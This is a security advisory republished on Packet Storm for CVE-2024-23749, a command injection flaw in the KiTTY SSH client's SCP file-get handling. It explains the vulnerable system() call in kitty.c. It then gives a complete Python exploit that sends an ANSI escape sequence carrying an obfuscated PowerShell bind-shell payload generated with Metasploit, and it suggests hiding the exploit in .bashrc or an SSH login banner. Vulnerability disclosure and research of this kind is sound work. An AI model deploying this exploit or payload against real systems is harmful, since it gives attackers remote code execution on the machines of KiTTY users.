KiTTY versions 0.76.1.13 and below suffer from a command injection vulnerability when getting a remote file through scp. It appears to leverage an ANSI escape sequence issue which is quite an interesting vector of attack.
9f28adde33c5791a14e7705f8844a344ce30e9443338e16ab264e1393fd4e9a8-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input (CVE-2024-23749)
===========================================================================================
Contents:
---------
Summary
Analysis
Exploitation
Acknowledgments
Timeline
Additional Advisory
Summary:
--------
Austin A. DeFrancesco (DEFCESCO) discovered a command injection vulnerability in KiTTY (https://github.com/cyd01/KiTTY/). This vulnerability:
- Is exploitable by any KiTTY user connecting to a host with the embedded exploit;
- The vulnerability was introduced in the original release in May 2021 (commit 4f79b1e) and affects all versions up to KiTTY ≤ 0.76.1.13 in their default configuration.
Austin developed an exploit for this vulnerability and obtained remote code execution in the context of the user running the application; by default, KiTTY can be operated in the user permission group of Standard Users. This exploit is stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.
Analysis:
---------
CVE-2024-23749 command injection vulnerability is in `kitty.c` precisely the `GetOneFile` function. The vulnerable lines of code are on lines `2369-2386`; in the latest revision `75fa2abcd220c172` (https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2369C4-L2391C2).
If KiTTY encounters the ANSI escape sequence `\\033]0;__rv` in a stream, it interprets it as an instruction to transfer files using Putty Secure Copy Protocol (PSCP):
- `\\033`: This is the escape character (octal representation of ASCII ESC), which signals the beginning of an escape sequence.
- `]0;`: This sequence part indicates a metacommand will be defined.
- `__rv`: This is the vulnerable KiTTY command to transfer files using PSCP, which takes the input of a filename or file path.
- `\\077`: This is the terminator sequence to indicate the end of the escape sequence.
- KiTTY’s `kitty.c` `__rv` command runs through specific handling based on the input parameters and configurations.
After the series of specific handling requests for other input parameters and configurations (at lines 2277-2368), KiTTY checks if the `filename` is larger than zero and checks if the `filename` is a directory or a single filename (at lines 2372). After these parameter and configuration checks, the filename is concatenated to the `buffer` (at line 2377). Finally, the constructed buffer is executed using the `system( buffer )` (at line 2386).
CVE-2024-24749, where the `filename` variable is vulnerable to command injection, occurs due to insufficient input sanitization and validation, failure to escape special characters, and insecure system calls (at lines 2369-2390). This allows an attacker to add inputs inside the `filename` variable, leading to arbitrary code execution.
2369 if( filename[0]=='/' ) { 2370 strcat(buffer, filename ) ; 2371 } else { 2372 if( (directory!=NULL) && (strlen(directory)>0) && (strlen(filename)>0) ) { 2373 strcat( buffer, directory ) ; strcat( buffer, "/" ) ; strcat( buffer, filename ) ; 2374 } else if( (directory!=NULL) && (strlen(directory)>0) ) { 2375 strcat(buffer, directory ) ; strcat( buffer, "/*") ; 2376 } else { 2377 strcat(buffer, filename ) ; 2378 } 2379 } 2380 strcat( buffer, "\" \"" ) ; strcat( buffer, dir ) ; strcat( buffer, "\"" ) ; 2381 //strcat( buffer, " > kitty.log 2>&1" ) ; //if( !system( buffer ) ) unlink( "kitty.log" ) ; 2382 2383 chdir( InitialDirectory ) ; 2384 2385 if( debug_flag ) { debug_logevent( "Get on file: %s", buffer) ; } 2386 if( system( buffer ) ) { MessageBox( NULL, buffer, "Transfer problem", MB_OK|MB_ICONERROR ) ; } 2387 2388 //debug_log("%s\n",buffer);//MessageBox( NULL, buffer, "Info",MB_OK ); 2389 2390 memset(buffer,0,strlen(buffer)); 2391 }
Exploitation:
-------------
### __rv Command Injection:
>From an attacker’s point of view, the exploit CVE-2024-23749 can be inserted into the `.bashrc` file for all users or in the SSH warning/message of the day (MOTD) banner. The exploit will trigger once the user logs in or is presented with the SSH warning/MOTD banner.
KiTTY’s `__rv` function crashed (at line 2601) because adjacent memory was overwritten.
To reproduce the vulnerability, follow these steps:
1. Start KiTTY and start an SSH session.
2. Update the payload handler and payload documented in the exploit’s comments.
3. Save the exploit on the connected SSH session.
4. Execute the exploit using Python: `python3 CVE-2024-23749.py`.
#!/usr/bin/python
#----------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY #
# Get Remote File Through SCP Input (CVE-2024-23749) #
# OS: Microsoft Windows 11/10/8/7/XP #
# Author: DEFCESCO (Austin A. DeFrancesco) #
# Software: #
# <https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip> #
#----------------------------------------------------------------------------------------#
# More details can be found on my blog: <https://blog.DEFCESCO.io/Hell0+KiTTY> #
#----------------------------------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(cmd/windows/powershell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) #
#----------------------------------------------------------------------------------------#
import os
import sys
#-----------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
#-----------------------------------------------------------------#
shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create'
shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G'
shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa'
shellcode += b'se64String(((\\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\\'+\\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
shellcode += b'kvUBgYPA3APsGG\\'+\\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
shellcode += b'jBeXa\\'+\\'QgRGld\\'+\\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\\'+\\'AFWMm85{2}gI/hVGUK'
shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\\'+\\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
shellcode += b'8kWhDlXHr\\'+\\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\\'+'
shellcode += b'\\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\\'+'
shellcode += b'\\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\\'+\\'1Txf3SQJhG8E/BlNRyY'
shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\\'+\\'T3Ztk3Tt{2}2'
shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\\'+\\'IyoERfSimrYbXTGP{1}g1Jc'
shellcode += b'7\\'+\\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\\')-f'
shellcode += b'\\'=\\',\\'9\\',\\'O\\')))),[System.IO.Compression.CompressionMode]::Decompr'
shellcode += b'ess))).ReadToEnd()))\\"'
escape_sequence = b'\\033]0;__rv:'
escape_sequence += b'" & '
escape_sequence += shellcode
escape_sequence += b' #\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
Acknowledgments:
----------------
Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE service requests.
Timeline:
---------
2024-01-08: This advisory contains one vulnerability and one additional advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont; no reply from Cyril.
2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to Cyril Dupont; no reply.
2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).
Additional Advisory:
--------------------
Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname (CVE-2024-25003) & Username (CVE-2024-25004) Variables: https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail
wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAAFkhAQD2y/dueupEMnNKAxNfh243Q25I+ofw2gxvT1cg6nkniQEAgH5A
7uuWKGMhwDEqQCrVtc2+yZ3h1hbdJI/8ZbCLhAc=
=j94V
-----END PGP SIGNATURE-----
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed